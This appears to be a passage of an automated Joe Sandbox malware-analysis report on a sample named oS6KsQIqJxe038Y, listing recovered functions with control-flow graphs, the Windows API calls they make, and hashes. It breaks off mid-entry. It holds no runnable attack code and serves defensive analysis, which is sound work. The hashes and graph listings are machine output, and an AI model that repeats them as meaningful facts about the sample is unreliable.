407->415 408->407 413 7264940-7264962 call 72632f4 408->413 413->415 414->415 423 7264984-726498b call 72632f4 414->423 454 726499d call 726a8c0 415->454 455 726499d call 726a8d0 415->455 421 72649a0-72649b0 427 7264a05-7264a14 421->427 428 72649b2-72649bc 421->428 423->415 427->406 433 72649be-72649d1 call 7263300 428->433 434 72649fa-72649ff 428->434 433->434 441 72649d3-72649f5 call 7263310 433->441 450 7264a02 call bf9485c 434->450 451 7264a02 call bf945e0 434->451 452 7264a02 call bf945d0 434->452 441->434 450->427 451->427 452->427 454->421 455->421
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveCaptureWindow
                                                                                        • String ID: Haq$Haq
                                                                                        • API String ID: 2424615356-4016896955
                                                                                        • Opcode ID: 29966620df67acf813c8259cf5bb62dd092a2b13c2c9f3ff9b3c99566ce1b2c0
                                                                                        • Instruction ID: f40965ffaada76b187235f5ced47d9a2c86a232c7a09cc6ec819272b3d51533d
                                                                                        • Opcode Fuzzy Hash: 29966620df67acf813c8259cf5bb62dd092a2b13c2c9f3ff9b3c99566ce1b2c0
                                                                                        • Instruction Fuzzy Hash: CF22A070B102598FDB59EFB9C4546AEBBF6AFC8300F24816AD405AB395DF349D82CB50
                                                                                        Function 07264590 Relevance: 3.3, APIs: 2, Instructions: 319COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 593 7264590-7264605 594 7264aed-7264b56 593->594 595 726460b-7264618 593->595 599 7264b5d-7264bb4 594->599 598 726461e-7264628 595->598 595->599 604 726462e-7264638 598->604 605 7264bbb-7264c12 598->605 599->605 607 726463e-7264648 604->607 608 7264c19-7264c70 604->608 605->608 611 7264c77-7264cd4 607->611 612 726464e-7264655 607->612 608->611 619 7264cdb-7264d49 611->619 612->619 620 726465b-726465f 612->620 679 7264d51-7264d53 619->679 680 7264d4b-7264d4f 619->680 623 72646b6-726470a call 72632b8 call 72632c8 GetCapture 620->623 624 7264661-7264696 620->624 646 7264713-7264721 623->646 647 726470c-7264712 623->647 624->623 649 7264698-72646a7 624->649 652 7264723-7264748 call 72632d8 646->652 653 726474d-7264782 GetActiveWindow 646->653 647->646 649->623 665 72646a9-72646b3 call 72632a8 649->665 652->653 659 7264784-726478a 653->659 660 726478b-726479c 653->660 659->660 662 726479e-72647a9 660->662 663 72647ab 660->663 668 72647ae-72647e0 662->668 663->668 665->623 685 72647f5-7264818 668->685 686 72647e2-72647e8 668->686 681 7264d58-7264d66 679->681 680->681 691 72648e0-72648ea 685->691 692 726481e-7264828 685->692 686->685 687 72647ea-72647f0 call 72632e4 686->687 687->685 693 72648f5-7264918 691->693 694 72648ec-72648ef call 7264db7 691->694 692->691 697 726482e-7264861 692->697 700 7264920-726492e 693->700 701 726491a-726491d 693->701 694->693 704 7264867-72648d6 697->704 705 7264a33-7264ac2 call 72632e4 697->705 706 7264964-7264972 700->706 707 7264930-726493e 700->707 701->700 704->691 705->594 713 7264974-7264982 706->713 714 7264990-7264997 706->714 707->706 712 7264940-7264962 call 72632f4 707->712 712->714 713->714 722 7264984-726498b call 72632f4 713->722 753 726499d call 726a8c0 714->753 754 726499d call 726a8d0 714->754 720 72649a0-72649b0 726 7264a05-7264a14 720->726 727 72649b2-72649bc 720->727 722->714 726->705 732 72649be-72649d1 call 7263300 727->732 733 72649fa-72649ff 727->733 732->733 740 72649d3-72649f5 call 7263310 732->740 749 7264a02 call bf9485c 733->749 750 7264a02 call bf945e0 733->750 751 7264a02 call bf945d0 733->751 740->733 749->726 750->726 751->726 753->720 754->720
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: ActiveCaptureWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2424615356-0
                                                                                        • Opcode ID: 4b7c018cc437867528ee78d402fc4e2c5729946902e358b5f8d381143ba276c3
                                                                                        • Instruction ID: 9d92e795458f447ed6ddb4f69deb7bb54db599ce232adbe59cb794d111d16faf
                                                                                        • Opcode Fuzzy Hash: 4b7c018cc437867528ee78d402fc4e2c5729946902e358b5f8d381143ba276c3
                                                                                        • Instruction Fuzzy Hash: F3D11FB4E10249CFDB25EFB5C548A9DBBF2BF89304F24826AE545AB251DB709D81CF40
                                                                                        Function 0B6116A0 Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 806 b6116a0-b611703 807 b611732-b611750 806->807 808 b611705-b61172f 806->808 813 b611752-b611754 807->813 814 b611759-b611790 807->814 808->807 815 b611c12-b611c27 813->815 818 b611bc1 814->818 819 b611796-b6117aa 814->819 822 b611bc6-b611bdc 818->822 820 b6117d9-b6117f8 819->820 821 b6117ac-b6117d6 819->821 828 b611810-b611812 820->828 829 b6117fa-b611800 820->829 821->820 822->815 832 b611831-b61183a 828->832 833 b611814-b61182c 828->833 830 b611802 829->830 831 b611804-b611806 829->831 830->828 831->828 835 b611842-b611849 832->835 833->822 836 b611853-b61185a 835->836 837 b61184b-b611851 835->837 839 b611864 836->839 840 b61185c-b611862 836->840 838 b611867-b611884 call b6105c0 837->838 843 b6119d9-b6119dd 838->843 844 b61188a-b611891 838->844 839->838 840->838 846 b6119e3-b6119e7 843->846 847 b611bac-b611bbf 843->847 844->818 845 b611897-b6118d4 844->845 855 b611ba2-b611ba6 845->855 856 b6118da-b6118df 845->856 848 b611a01-b611a0a 846->848 849 b6119e9-b6119fc 846->849 847->822 851 b611a39-b611a40 848->851 852 b611a0c-b611a36 848->852 849->822 853 b611a46-b611a4d 851->853 854 b611adf-b611af4 851->854 852->851 857 b611a7c-b611a9e 853->857 858 b611a4f-b611a79 853->858 854->855 867 b611afa-b611afc 854->867 855->835 855->847 859 b611911-b611926 call b6105e4 856->859 860 b6118e1-b6118ef call b6105cc 856->860 857->854 894 b611aa0-b611aaa 857->894 858->857 865 b61192b-b61192f 859->865 860->859 875 b6118f1-b61190a call b6105d8 860->875 871 b611931-b611943 call b6105f0 865->871 872 b6119a0-b6119ad 865->872 873 b611b49-b611b5f call b6105c0 867->873 874 b611afe-b611b37 867->874 899 b611983-b61199b 871->899 900 b611945-b611975 871->900 872->855 886 b6119b3-b6119bd call b610600 872->886 883 b611b64-b611b66 873->883 889 b611b40-b611b47 874->889 890 b611b39-b611b3f 874->890 884 b61190f 875->884 883->855 892 b611b68-b611b94 WaitMessage 883->892 884->865 902 b6119cc-b6119d4 call b610618 886->902 903 b6119bf-b6119c2 call b61060c 886->903 889->855 890->889 896 b611b96 892->896 897 b611b9b 892->897 907 b611ac2-b611add 894->907 908 b611aac-b611ab2 894->908 896->897 897->855 899->822 914 b611977 900->914 915 b61197c 900->915 902->855 910 b6119c7 903->910 907->854 907->894 912 b611ab4 908->912 913 b611ab6-b611ab8 908->913 910->855 912->907 913->907 914->915 915->899
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: a652c5f799adda9651f6e95f8cb281fe51445d97e484ad54d2669a342cde51ab
                                                                                        • Instruction ID: 73b820eadb6d736badbcb9326a8af50e05baeebf708de07b022caa3f5b5f2e8a
                                                                                        • Opcode Fuzzy Hash: a652c5f799adda9651f6e95f8cb281fe51445d97e484ad54d2669a342cde51ab
                                                                                        • Instruction Fuzzy Hash: B0F15AB0A002098FDB14DFA9C944B9DBBF1FF49704F18C969E519AB365DB70A985CF80
                                                                                        Function 07260040 Relevance: 1.7, Strings: 1, Instructions: 417COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 918 7260040-7260084 920 726025c-7260266 918->920 921 726008a-7260094 918->921 922 7260278-72602de 920->922 923 7260268-7260272 920->923 921->920 924 726009a-72601fc 921->924 948 72602e4-726032b 922->948 949 7260519-7260549 922->949 923->922 925 72605c8-72605cf 923->925 1013 7260231-726025a 924->1013 1014 72601fe-726022f 924->1014 928 72605d5-726067f 925->928 929 72607e3-72607f0 925->929 978 7260682-72606c5 928->978 948->949 972 7260331-72603c9 948->972 958 726057e-7260590 949->958 959 726054b-7260577 949->959 965 72605c5-72605c6 958->965 966 7260592-72605be 958->966 959->958 965->925 966->965 1035 72603ce call 7260be8 972->1035 1036 72603ce call 7260bd8 972->1036 985 72606c7 978->985 986 72606d3-72606f3 978->986 985->986 986->978 992 72606f5-7260761 986->992 1024 7260762 992->1024 997 72603d3-72603e3 1002 72604a9-72604ca 997->1002 1003 72603e9-726049e 997->1003 1011 72604e6-72604ed 1002->1011 1012 72604cc-72604d3 1002->1012 1003->1002 1018 72604ef-72604f6 1011->1018 1019 7260509 1011->1019 1012->1011 1017 72604d5-72604db 1012->1017 1013->920 1014->1013 1033 72604e1 call 7260f70 1017->1033 1034 72604e1 call 7260f5f 1017->1034 1018->1019 1023 72604f8-72604fe 1018->1023 1019->949 1023->1019 1024->1024 1033->1011 1034->1011 1035->997 1036->997
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 91b6bbe239b8c7fa354b6213299884832c658c3bf984cdb0985163335b06a634
                                                                                        • Instruction ID: 680562b6b0028590de622c253562c62a158d4d45297aace13e350a7ecc832e11
                                                                                        • Opcode Fuzzy Hash: 91b6bbe239b8c7fa354b6213299884832c658c3bf984cdb0985163335b06a634
                                                                                        • Instruction Fuzzy Hash: 32022F71E10219CFDB25EF64C858BEDB7B6AF88300F10869AD5097B290EF709A85DF51
                                                                                        Function 0B6194B8 Relevance: .6, Instructions: 635COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 185128b820f94d192a47b9d7b3c7eb2d2865466a17e21484b61c5331a5d58627
                                                                                        • Instruction ID: c9f523631ddb1ecee5f83b6516211993200e9dc4e36b34c55e132a9cb6cc0a4e
                                                                                        • Opcode Fuzzy Hash: 185128b820f94d192a47b9d7b3c7eb2d2865466a17e21484b61c5331a5d58627
                                                                                        • Instruction Fuzzy Hash: D1523F75910619CFCB21DF64C855AE9BBB1FF89304F1486D9E409AB261EB31EAC6CF40
                                                                                        Function 0B61CEE9 Relevance: .5, Instructions: 520COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7804c6a0a420889ba550eecbaee622fe56f83a7685fb1d6170dd1c635ea7dadc
                                                                                        • Instruction ID: d356fcd68a94a66cc8f1b64a5428829221bb77a88d7786c8335a5719742180a4
                                                                                        • Opcode Fuzzy Hash: 7804c6a0a420889ba550eecbaee622fe56f83a7685fb1d6170dd1c635ea7dadc
                                                                                        • Instruction Fuzzy Hash: A5321871A00619CFCB21DF64C944BD9B7B2FF89304F1589E9E40DAB261EB75AA85CF40
                                                                                        Function 0BF95E68 Relevance: .3, Instructions: 347COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 885f432012dff75b794d0f49139c14a897282568a4b632c8ff926f0e13e95086
                                                                                        • Instruction ID: 913fd547847d827e06e90c4829af277704ae20a64e5ff897d98c847127a5ecb1
                                                                                        • Opcode Fuzzy Hash: 885f432012dff75b794d0f49139c14a897282568a4b632c8ff926f0e13e95086
                                                                                        • Instruction Fuzzy Hash: 5CC1DD72B007019FEB2ADB79D460B6EB7FAAF89704F14446DD146CB2A1DB34E842CB51
                                                                                        Function 0BF90158 Relevance: .3, Instructions: 336COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2270241707.000000000BF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BF90000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_bf90000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a10c7a3028cb44dd47a7deb03c3e570f3d5fdbb694ba427ecf22e72c3c1dd9e5
                                                                                        • Instruction ID: 69e4b87de7225e98136ccb77f72423cd0782326b9d923eacf73fb11076be3cf1
                                                                                        • Opcode Fuzzy Hash: a10c7a3028cb44dd47a7deb03c3e570f3d5fdbb694ba427ecf22e72c3c1dd9e5
                                                                                        • Instruction Fuzzy Hash: 90D10575E00218CFDB14DFA9D984A9DBBB2FF89310F1480A9D419AB325DB30AD86CF50
                                                                                        Function 0133DFB4 Relevance: .3, Instructions: 264COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 09f652484ef823d9c4744b9515cfec259a7029fdb1ed666f4b998288e99dde4d
                                                                                        • Instruction ID: e49d99566ab62cb9925f793a5b27743154f78f71d725af2098a66dd7d1fc7577
                                                                                        • Opcode Fuzzy Hash: 09f652484ef823d9c4744b9515cfec259a7029fdb1ed666f4b998288e99dde4d
                                                                                        • Instruction Fuzzy Hash: 4FA17F32E002168FCF15DFB9C88059EBBB6FFC4304B55457AE901AB265DB71E915CB80
                                                                                        Function 01337038 Relevance: .1, Instructions: 142COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 72d1448a380b238908911149d9b011db07641b030b0b4fa3dc8349d9e2e63779
                                                                                        • Instruction ID: e7a26314374d8806f0ecf2e571354c8b2c2e82bf0214307eb2b554ea61129e3f
                                                                                        • Opcode Fuzzy Hash: 72d1448a380b238908911149d9b011db07641b030b0b4fa3dc8349d9e2e63779
                                                                                        • Instruction Fuzzy Hash: 4751D570E002099FDB09DFA9D855AEEFBF2BF88304F148429D419AB368DB355846CF94
                                                                                        Function 01334204 Relevance: .1, Instructions: 139COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1f9b22624b6b24ea36e72715c4cb2e9508590320b3368e0be50beb4cfe397ac7
                                                                                        • Instruction ID: 45831ee699d57e3c5968eb746d5c388a1ee1f2bbd85804f788ecb70afc3798d6
                                                                                        • Opcode Fuzzy Hash: 1f9b22624b6b24ea36e72715c4cb2e9508590320b3368e0be50beb4cfe397ac7
                                                                                        • Instruction Fuzzy Hash: 1A51B574E002099FDB08DFA9D895AEEFBF2FF88304F148429D419AB368DB355846CB54
                                                                                        Function 0133D45B Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 456 133d45b-133d4ef GetCurrentProcess 460 133d4f1-133d4f7 456->460 461 133d4f8-133d52c GetCurrentThread 456->461 460->461 462 133d535-133d569 GetCurrentProcess 461->462 463 133d52e-133d534 461->463 464 133d572-133d58d call 133d63b 462->464 465 133d56b-133d571 462->465 463->462 469 133d593-133d5c2 GetCurrentThreadId 464->469 465->464 470 133d5c4-133d5ca 469->470 471 133d5cb-133d62d 469->471 470->471
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0133D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0133D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 1f1ff93bda348b63800e471bfb7e74af8e56f2b98a74838e958e893812ee3578
                                                                                        • Instruction ID: d186f55976e3ff0fecdc505e7da34cb7e027a16c681dd9317860d14c1f688696
                                                                                        • Opcode Fuzzy Hash: 1f1ff93bda348b63800e471bfb7e74af8e56f2b98a74838e958e893812ee3578
                                                                                        • Instruction Fuzzy Hash: DF5156B09002498FDB18DFA9D548BAEBBF5FF88308F208059E509A73A0D7349949CB65
                                                                                        Function 0133D460 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 478 133d460-133d4ef GetCurrentProcess 482 133d4f1-133d4f7 478->482 483 133d4f8-133d52c GetCurrentThread 478->483 482->483 484 133d535-133d569 GetCurrentProcess 483->484 485 133d52e-133d534 483->485 486 133d572-133d58d call 133d63b 484->486 487 133d56b-133d571 484->487 485->484 491 133d593-133d5c2 GetCurrentThreadId 486->491 487->486 492 133d5c4-133d5ca 491->492 493 133d5cb-133d62d 491->493 492->493
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D4DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 0133D51B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 0133D558
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0133D5B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 56c9c8daaf331cbc96710fbc2bc49401744df0ff876bb633e51b44f7b44c7590
                                                                                        • Instruction ID: fbf9f0c771186dcbcf5b48c563b8960d7414e0a08ec7d0db3aebf50ed87bff9c
                                                                                        • Opcode Fuzzy Hash: 56c9c8daaf331cbc96710fbc2bc49401744df0ff876bb633e51b44f7b44c7590
                                                                                        • Instruction Fuzzy Hash: AC5158B4900349CFDB18DFA9D548B9EBBF5FF88308F208059E519A73A0D7349948CB65
                                                                                        Function 07266BB8 Relevance: 1.6, APIs: 1, Instructions: 102windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1037 7266bb8-7269332 1040 7269334-726933f 1037->1040 1041 72693ae-72693b1 1037->1041 1040->1041 1046 7269341-7269367 GetFocus 1040->1046 1042 72693d6-72693d8 1041->1042 1044 72693e5-72693e7 1042->1044 1045 72693da-72693e3 1042->1045 1047 7269407-7269414 1044->1047 1048 72693e9-72693f2 1044->1048 1045->1044 1052 72693b3-72693bf 1045->1052 1049 7269370-7269379 1046->1049 1050 7269369-726936f 1046->1050 1048->1047 1057 72693f4-7269401 1048->1057 1053 7269390-72693a7 call 7265114 1049->1053 1054 726937b-726938e 1049->1054 1050->1049 1052->1044 1062 72693c1-72693d4 1052->1062 1065 72693ac KiUserCallbackDispatcher 1053->1065 1054->1047 1054->1053 1057->1047 1064 7269402 call 7265114 1057->1064 1062->1042 1064->1047 1065->1047
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Focus
                                                                                        • String ID:
                                                                                        • API String ID: 2734777837-0
                                                                                        • Opcode ID: d91d4ceef686a4a20b92091ea6128ab9eda13c49f99020feddb3e1070ac5ce78
                                                                                        • Instruction ID: 4605d13994a7101070a1d42920aaa2d75db28ccc6e2d4f48edf24bc368d4ac59
                                                                                        • Opcode Fuzzy Hash: d91d4ceef686a4a20b92091ea6128ab9eda13c49f99020feddb3e1070ac5ce78
                                                                                        • Instruction Fuzzy Hash: A83150B4A202568FCB109F69C448AAEBBB9FF44714F15445AD845EB350CB75E880CBE1
                                                                                        Function 013344E4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1068 13344e4-13359d9 CreateActCtxA 1071 13359e2-1335a3c 1068->1071 1072 13359db-13359e1 1068->1072 1079 1335a4b-1335a4f 1071->1079 1080 1335a3e-1335a41 1071->1080 1072->1071 1081 1335a51-1335a5d 1079->1081 1082 1335a60 1079->1082 1080->1079 1081->1082 1084 1335a61 1082->1084 1084->1084
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 4599757b53ee85ddc6d7be14808ef1d0897ffdde78631dcc3893e6d4b896101e
                                                                                        • Instruction ID: 1d77defb141b12c767cc6f3853fed20a4b7dfedfec7b3297f26d1c150379d146
                                                                                        • Opcode Fuzzy Hash: 4599757b53ee85ddc6d7be14808ef1d0897ffdde78631dcc3893e6d4b896101e
                                                                                        • Instruction Fuzzy Hash: 0541F2B0C0071DCBDB24CFA9C844B9DBBB5BF49308F24806AD408AB255DB75594ACF90
                                                                                        Function 0133590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1085 133590d-13359d9 CreateActCtxA 1087 13359e2-1335a3c 1085->1087 1088 13359db-13359e1 1085->1088 1095 1335a4b-1335a4f 1087->1095 1096 1335a3e-1335a41 1087->1096 1088->1087 1097 1335a51-1335a5d 1095->1097 1098 1335a60 1095->1098 1096->1095 1097->1098 1100 1335a61 1098->1100 1100->1100
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 013359C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2263408209.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1330000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: ea705127bb5ca1915710e53bdbbbc016115c29fc91e65b0fc37dd3e20582fdf4
                                                                                        • Instruction ID: 6445cb8390654ae40609d2bb8967b70c50e378051457473e028bd3f6c71d13de
                                                                                        • Opcode Fuzzy Hash: ea705127bb5ca1915710e53bdbbbc016115c29fc91e65b0fc37dd3e20582fdf4
                                                                                        • Instruction Fuzzy Hash: 1041E4B0C00719CFDB25CFA9C884B9DBBF5BF49308F24816AD418AB255D775594ACF90
                                                                                        Function 0B61256A Relevance: 1.6, APIs: 1, Instructions: 91windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0B6119C7), ref: 0B61253D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2269869541.000000000B610000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B610000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b610000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: DispatchMessage
                                                                                        • String ID:
                                                                                        • API String ID: 2061451462-0
                                                                                        • Opcode ID: c23a9b3d924c5608cfc9ec99d659d500017e62de3b591bbb2399a641471cbb8c
                                                                                        • Instruction ID: 8b4cf3aafb43ee015dbb2f37e495ef8ab3b6936027f4fff9bfffa4aede968d33
                                                                                        • Opcode Fuzzy Hash: c23a9b3d924c5608cfc9ec99d659d500017e62de3b591bbb2399a641471cbb8c
                                                                                        • Instruction Fuzzy Hash: 573148B59102599FCB14CFA9D8A4ADEBBF0BF48310F05885AD414A7361C7349844CF61
                                                                                        Function 072692E1 Relevance: 1.6, APIs: 1, Instructions: 70windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: Focus
                                                                                        • String ID:
                                                                                        • API String ID: 2734777837-0
                                                                                        • Opcode ID: 1e1ae00dc41e6cf2a6120aa36baf4f7c8375dbf1ad8e45a22048139e0442617c
                                                                                        • Instruction ID: 64855643cf1618ec90b398cf56a0b6334d9d7db98f5d30940b2b3772f181982f
                                                                                        • Opcode Fuzzy Hash: 1e1ae00dc41e6cf2a6120aa36baf4f7c8375dbf1ad8e45a22048139e0442617c
                                                                                        • Instruction Fuzzy Hash: 7A2166B491035A8FCB20CFA9C448AAEBBB4FB08714F18459AD854A7740C735A890CBE1
                                                                                        Function 07265FC0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 07266052
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2268744389.0000000007260000.00000040.00000800.00020000.00000000.sdmp, Offset: 07260000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7260000_oS6KsQIqJxe038Y.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentThread
                                                                                        • String ID:
                                                                                        • API String ID: 2882836952-0
                                                                                        • Opcode ID: 594c4db02ca9f27e7b134b3ebaf9d977da5a9ba31ec60a5fb2981baf3f0d56d3
